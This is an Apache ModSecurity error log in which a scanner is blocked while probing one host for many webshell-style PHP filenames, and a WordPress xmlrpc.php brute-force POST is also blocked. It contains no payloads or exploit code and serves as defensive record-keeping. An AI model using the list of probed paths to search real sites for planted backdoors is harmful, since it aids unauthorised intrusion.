[Tue May 26 16:59:42.860015 2026] [security2:error] [pid 839808:tid 839941] [client 20.104.227.76:52233] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.athelstan.org.in"] [uri "/xxx.php"] [unique_id "ahWEJpqtwAfohijxAqhshwAAAQs"]
[Tue May 26 16:59:42.860130 2026] [security2:error] [pid 839808:tid 839941] [client 20.104.227.76:52233] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "autodiscover.athelstan.org.in"] [uri "/xxx.php"] [unique_id "ahWEJpqtwAfohijxAqhshwAAAQs"]
[Tue May 26 16:59:43.006252 2026] [security2:error] [pid 839808:tid 839987] [client 20.104.227.76:51730] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.athelstan.org.in"] [uri "/a7.php"] [unique_id "ahWEJ5qtwAfohijxAqhsjgAAATk"]
[Tue May 26 16:59:43.006374 2026] [security2:error] [pid 839808:tid 839987] [client 20.104.227.76:51730] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "autodiscover.athelstan.org.in"] [uri "/a7.php"] [unique_id "ahWEJ5qtwAfohijxAqhsjgAAATk"]
[Tue May 26 16:59:43.029686 2026] [security2:error] [pid 839808:tid 839942] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWEJZqtwAfohijxAqhsbQAAAQw"]
[Tue May 26 16:59:43.250199 2026] [security2:error] [pid 839808:tid 840039] [client 20.104.227.76:49897] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.athelstan.org.in"] [uri "/BDKR28WP.php"] [unique_id "ahWEJ5qtwAfohijxAqhsjwAAAW0"]
[Tue May 26 16:59:43.250321 2026] [security2:error] [pid 839808:tid 840039] [client 20.104.227.76:49897] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "autodiscover.athelstan.org.in"] [uri "/BDKR28WP.php"] [unique_id "ahWEJ5qtwAfohijxAqhsjwAAAW0"]
[Tue May 26 16:59:43.607825 2026] [security2:error] [pid 839808:tid 840016] [client 20.104.227.76:51749] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.athelstan.org.in"] [uri "/a1.php"] [unique_id "ahWEJ5qtwAfohijxAqhslgAAAVY"]
[Tue May 26 16:59:43.607946 2026] [security2:error] [pid 839808:tid 840016] [client 20.104.227.76:51749] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "autodiscover.athelstan.org.in"] [uri "/a1.php"] [unique_id "ahWEJ5qtwAfohijxAqhslgAAAVY"]
[Tue May 26 16:59:43.822516 2026] [security2:error] [pid 839808:tid 839953] [client 20.104.227.76:51830] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.athelstan.org.in"] [uri "/d.php"] [unique_id "ahWEJ5qtwAfohijxAqhsmgAAARc"]
[Tue May 26 16:59:43.822614 2026] [security2:error] [pid 839808:tid 839953] [client 20.104.227.76:51830] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "autodiscover.athelstan.org.in"] [uri "/d.php"] [unique_id "ahWEJ5qtwAfohijxAqhsmgAAARc"]
[Tue May 26 16:59:44.044145 2026] [security2:error] [pid 839808:tid 839994] [client 20.104.227.76:51297] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.athelstan.org.in"] [uri "/xff.php"] [unique_id "ahWEKJqtwAfohijxAqhsnwAAAUA"]
[Tue May 26 16:59:44.044252 2026] [security2:error] [pid 839808:tid 839994] [client 20.104.227.76:51297] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "autodiscover.athelstan.org.in"] [uri "/xff.php"] [unique_id "ahWEKJqtwAfohijxAqhsnwAAAUA"]
[Tue May 26 16:59:44.275958 2026] [security2:error] [pid 839808:tid 840019] [client 20.104.227.76:52252] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.athelstan.org.in"] [uri "/xltt.php"] [unique_id "ahWEKJqtwAfohijxAqhsqgAAAVk"]
[Tue May 26 16:59:44.276062 2026] [security2:error] [pid 839808:tid 840019] [client 20.104.227.76:52252] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "autodiscover.athelstan.org.in"] [uri "/xltt.php"] [unique_id "ahWEKJqtwAfohijxAqhsqgAAAVk"]
[Tue May 26 16:59:44.565320 2026] [security2:error] [pid 839808:tid 840006] [client 57.141.2.47:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWEJ5qtwAfohijxAqhskgAAAUw"]
[Tue May 26 16:59:44.586098 2026] [security2:error] [pid 839808:tid 840053] [client 20.104.227.76:51799] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.athelstan.org.in"] [uri "/son.php"] [unique_id "ahWEKJqtwAfohijxAqhsswAAAXs"]
[Tue May 26 16:59:44.586200 2026] [security2:error] [pid 839808:tid 840053] [client 20.104.227.76:51799] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "autodiscover.athelstan.org.in"] [uri "/son.php"] [unique_id "ahWEKJqtwAfohijxAqhsswAAAXs"]
[Tue May 26 16:59:44.869713 2026] [security2:error] [pid 839808:tid 839941] [client 20.104.227.76:50763] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.athelstan.org.in"] [uri "/doc.php"] [unique_id "ahWEKJqtwAfohijxAqhstgAAAQs"]
[Tue May 26 16:59:44.869826 2026] [security2:error] [pid 839808:tid 839941] [client 20.104.227.76:50763] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "autodiscover.athelstan.org.in"] [uri "/doc.php"] [unique_id "ahWEKJqtwAfohijxAqhstgAAAQs"]
[Tue May 26 16:59:45.110337 2026] [security2:error] [pid 839808:tid 840058] [client 20.104.227.76:52238] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.athelstan.org.in"] [uri "/zo.php"] [unique_id "ahWEKZqtwAfohijxAqhsvAAAAYA"]
[Tue May 26 16:59:45.110443 2026] [security2:error] [pid 839808:tid 840058] [client 20.104.227.76:52238] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "autodiscover.athelstan.org.in"] [uri "/zo.php"] [unique_id "ahWEKZqtwAfohijxAqhsvAAAAYA"]
[Tue May 26 16:59:45.478915 2026] [security2:error] [pid 839808:tid 840049] [client 20.104.227.76:51245] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.athelstan.org.in"] [uri "/xper1.php"] [unique_id "ahWEKZqtwAfohijxAqhsxgAAAXc"]
[Tue May 26 16:59:45.479053 2026] [security2:error] [pid 839808:tid 840049] [client 20.104.227.76:51245] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "autodiscover.athelstan.org.in"] [uri "/xper1.php"] [unique_id "ahWEKZqtwAfohijxAqhsxgAAAXc"]
[Tue May 26 16:59:45.670850 2026] [security2:error] [pid 839808:tid 840010] [client 20.104.227.76:52224] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.athelstan.org.in"] [uri "/tiny.php"] [unique_id "ahWEKZqtwAfohijxAqhszAAAAVA"]
[Tue May 26 16:59:45.670952 2026] [security2:error] [pid 839808:tid 840010] [client 20.104.227.76:52224] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "autodiscover.athelstan.org.in"] [uri "/tiny.php"] [unique_id "ahWEKZqtwAfohijxAqhszAAAAVA"]
[Tue May 26 16:59:45.897796 2026] [security2:error] [pid 839808:tid 839976] [client 20.104.227.76:51221] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.athelstan.org.in"] [uri "/s1.php"] [unique_id "ahWEKZqtwAfohijxAqhs1QAAAS4"]
[Tue May 26 16:59:45.897896 2026] [security2:error] [pid 839808:tid 839976] [client 20.104.227.76:51221] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "autodiscover.athelstan.org.in"] [uri "/s1.php"] [unique_id "ahWEKZqtwAfohijxAqhs1QAAAS4"]
[Tue May 26 16:59:46.133442 2026] [security2:error] [pid 839808:tid 840012] [client 20.104.227.76:51299] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.athelstan.org.in"] [uri "/de.php"] [unique_id "ahWEKpqtwAfohijxAqhs2QAAAVI"]
[Tue May 26 16:59:46.133552 2026] [security2:error] [pid 839808:tid 840012] [client 20.104.227.76:51299] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "autodiscover.athelstan.org.in"] [uri "/de.php"] [unique_id "ahWEKpqtwAfohijxAqhs2QAAAVI"]
[Tue May 26 16:59:46.400911 2026] [security2:error] [pid 839808:tid 840053] [client 20.104.227.76:50779] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.athelstan.org.in"] [uri "/1a.php"] [unique_id "ahWEKpqtwAfohijxAqhs5gAAAXs"]
[Tue May 26 16:59:46.401032 2026] [security2:error] [pid 839808:tid 840053] [client 20.104.227.76:50779] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "autodiscover.athelstan.org.in"] [uri "/1a.php"] [unique_id "ahWEKpqtwAfohijxAqhs5gAAAXs"]
[Tue May 26 16:59:46.559454 2026] [security2:error] [pid 839808:tid 839946] [client 20.104.227.76:50787] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.athelstan.org.in"] [uri "/2.php"] [unique_id "ahWEKpqtwAfohijxAqhs6gAAARA"]
[Tue May 26 16:59:46.559581 2026] [security2:error] [pid 839808:tid 839946] [client 20.104.227.76:50787] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "autodiscover.athelstan.org.in"] [uri "/2.php"] [unique_id "ahWEKpqtwAfohijxAqhs6gAAARA"]
[Tue May 26 16:59:46.764281 2026] [security2:error] [pid 839808:tid 839968] [client 20.104.227.76:52326] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.athelstan.org.in"] [uri "/sky.php"] [unique_id "ahWEKpqtwAfohijxAqhs8AAAASY"]
[Tue May 26 16:59:46.764391 2026] [security2:error] [pid 839808:tid 839968] [client 20.104.227.76:52326] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "autodiscover.athelstan.org.in"] [uri "/sky.php"] [unique_id "ahWEKpqtwAfohijxAqhs8AAAASY"]
[Tue May 26 16:59:46.923755 2026] [security2:error] [pid 839808:tid 840023] [client 20.104.227.76:51838] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.athelstan.org.in"] [uri "/man.php"] [unique_id "ahWEKpqtwAfohijxAqhs9gAAAV0"]
[Tue May 26 16:59:46.923956 2026] [security2:error] [pid 839808:tid 840023] [client 20.104.227.76:51838] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "autodiscover.athelstan.org.in"] [uri "/man.php"] [unique_id "ahWEKpqtwAfohijxAqhs9gAAAV0"]
[Tue May 26 16:59:47.137348 2026] [security2:error] [pid 839808:tid 839969] [client 57.141.2.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWEKpqtwAfohijxAqhs2AAAASc"]
[Tue May 26 16:59:47.153104 2026] [security2:error] [pid 839808:tid 839960] [client 20.104.227.76:51715] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.athelstan.org.in"] [uri "/ms-edit.php"] [unique_id "ahWEK5qtwAfohijxAqhs-wAAAR4"]
[Tue May 26 16:59:47.153256 2026] [security2:error] [pid 839808:tid 839960] [client 20.104.227.76:51715] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "autodiscover.athelstan.org.in"] [uri "/ms-edit.php"] [unique_id "ahWEK5qtwAfohijxAqhs-wAAAR4"]
[Tue May 26 16:59:47.712494 2026] [security2:error] [pid 839808:tid 840040] [client 20.104.227.76:50776] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.athelstan.org.in"] [uri "/7.php"] [unique_id "ahWEK5qtwAfohijxAqhtAgAAAW4"]
[Tue May 26 16:59:47.712608 2026] [security2:error] [pid 839808:tid 840040] [client 20.104.227.76:50776] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "autodiscover.athelstan.org.in"] [uri "/7.php"] [unique_id "ahWEK5qtwAfohijxAqhtAgAAAW4"]
[Tue May 26 16:59:47.955746 2026] [security2:error] [pid 839808:tid 840052] [client 20.104.227.76:52315] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.athelstan.org.in"] [uri "/pp.php"] [unique_id "ahWEK5qtwAfohijxAqhtDwAAAXo"]
[Tue May 26 16:59:47.955871 2026] [security2:error] [pid 839808:tid 840052] [client 20.104.227.76:52315] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "autodiscover.athelstan.org.in"] [uri "/pp.php"] [unique_id "ahWEK5qtwAfohijxAqhtDwAAAXo"]
[Tue May 26 16:59:48.210290 2026] [security2:error] [pid 839808:tid 840027] [client 20.104.227.76:52286] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.athelstan.org.in"] [uri "/mar.php"] [unique_id "ahWELJqtwAfohijxAqhtEwAAAWE"]
[Tue May 26 16:59:48.210427 2026] [security2:error] [pid 839808:tid 840027] [client 20.104.227.76:52286] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "autodiscover.athelstan.org.in"] [uri "/mar.php"] [unique_id "ahWELJqtwAfohijxAqhtEwAAAWE"]
[Tue May 26 16:59:48.573790 2026] [security2:error] [pid 839808:tid 839971] [client 20.104.227.76:51308] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.athelstan.org.in"] [uri "/acp.php"] [unique_id "ahWELJqtwAfohijxAqhtGgAAASk"]
[Tue May 26 16:59:48.573927 2026] [security2:error] [pid 839808:tid 839971] [client 20.104.227.76:51308] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "autodiscover.athelstan.org.in"] [uri "/acp.php"] [unique_id "ahWELJqtwAfohijxAqhtGgAAASk"]
[Tue May 26 16:59:48.782494 2026] [security2:error] [pid 839808:tid 840002] [client 57.141.2.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWEK5qtwAfohijxAqhtBQAAAUg"]
[Tue May 26 16:59:48.963388 2026] [security2:error] [pid 839808:tid 839996] [client 20.104.227.76:52335] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.athelstan.org.in"] [uri "/zdd.php"] [unique_id "ahWELJqtwAfohijxAqhtIQAAAUI"]
[Tue May 26 16:59:48.963523 2026] [security2:error] [pid 839808:tid 839996] [client 20.104.227.76:52335] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "autodiscover.athelstan.org.in"] [uri "/zdd.php"] [unique_id "ahWELJqtwAfohijxAqhtIQAAAUI"]
[Tue May 26 16:59:49.154330 2026] [security2:error] [pid 839808:tid 839994] [client 20.104.227.76:52228] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.athelstan.org.in"] [uri "/link.php"] [unique_id "ahWELZqtwAfohijxAqhtIwAAAUA"]
[Tue May 26 16:59:49.154427 2026] [security2:error] [pid 839808:tid 839994] [client 20.104.227.76:52228] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "autodiscover.athelstan.org.in"] [uri "/link.php"] [unique_id "ahWELZqtwAfohijxAqhtIwAAAUA"]
[Tue May 26 16:59:49.490155 2026] [security2:error] [pid 839808:tid 840001] [client 20.104.227.76:52258] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.athelstan.org.in"] [uri "/sallu.php"] [unique_id "ahWELZqtwAfohijxAqhtKgAAAUc"]
[Tue May 26 16:59:49.490300 2026] [security2:error] [pid 839808:tid 840001] [client 20.104.227.76:52258] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "autodiscover.athelstan.org.in"] [uri "/sallu.php"] [unique_id "ahWELZqtwAfohijxAqhtKgAAAUc"]
[Tue May 26 16:59:49.671375 2026] [security2:error] [pid 839808:tid 840046] [client 20.104.227.76:51220] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.athelstan.org.in"] [uri "/aboute.php"] [unique_id "ahWELZqtwAfohijxAqhtLwAAAXQ"]
[Tue May 26 16:59:49.671476 2026] [security2:error] [pid 839808:tid 840046] [client 20.104.227.76:51220] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "autodiscover.athelstan.org.in"] [uri "/aboute.php"] [unique_id "ahWELZqtwAfohijxAqhtLwAAAXQ"]
[Tue May 26 16:59:49.896765 2026] [security2:error] [pid 839808:tid 840065] [client 20.104.227.76:51251] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.athelstan.org.in"] [uri "/one.php"] [unique_id "ahWELZqtwAfohijxAqhtNgAAAYc"]
[Tue May 26 16:59:49.896931 2026] [security2:error] [pid 839808:tid 840065] [client 20.104.227.76:51251] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "autodiscover.athelstan.org.in"] [uri "/one.php"] [unique_id "ahWELZqtwAfohijxAqhtNgAAAYc"]
[Tue May 26 16:59:50.010367 2026] [security2:error] [pid 839808:tid 840016] [client 23.158.233.122:62776] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 122.233.158.23.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahWELZqtwAfohijxAqhtLgAAAVY"], referer: https://www.cagmedya.com/web-tasarim/
[Tue May 26 16:59:50.010542 2026] [security2:error] [pid 839808:tid 840016] [client 23.158.233.122:62776] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahWELZqtwAfohijxAqhtLgAAAVY"], referer: https://www.cagmedya.com/web-tasarim/
[Tue May 26 16:59:50.180018 2026] [security2:error] [pid 839808:tid 839982] [client 20.104.227.76:51721] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.athelstan.org.in"] [uri "/tx79.php"] [unique_id "ahWELpqtwAfohijxAqhtQQAAATQ"]
[Tue May 26 16:59:50.180159 2026] [security2:error] [pid 839808:tid 839982] [client 20.104.227.76:51721] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "autodiscover.athelstan.org.in"] [uri "/tx79.php"] [unique_id "ahWELpqtwAfohijxAqhtQQAAATQ"]
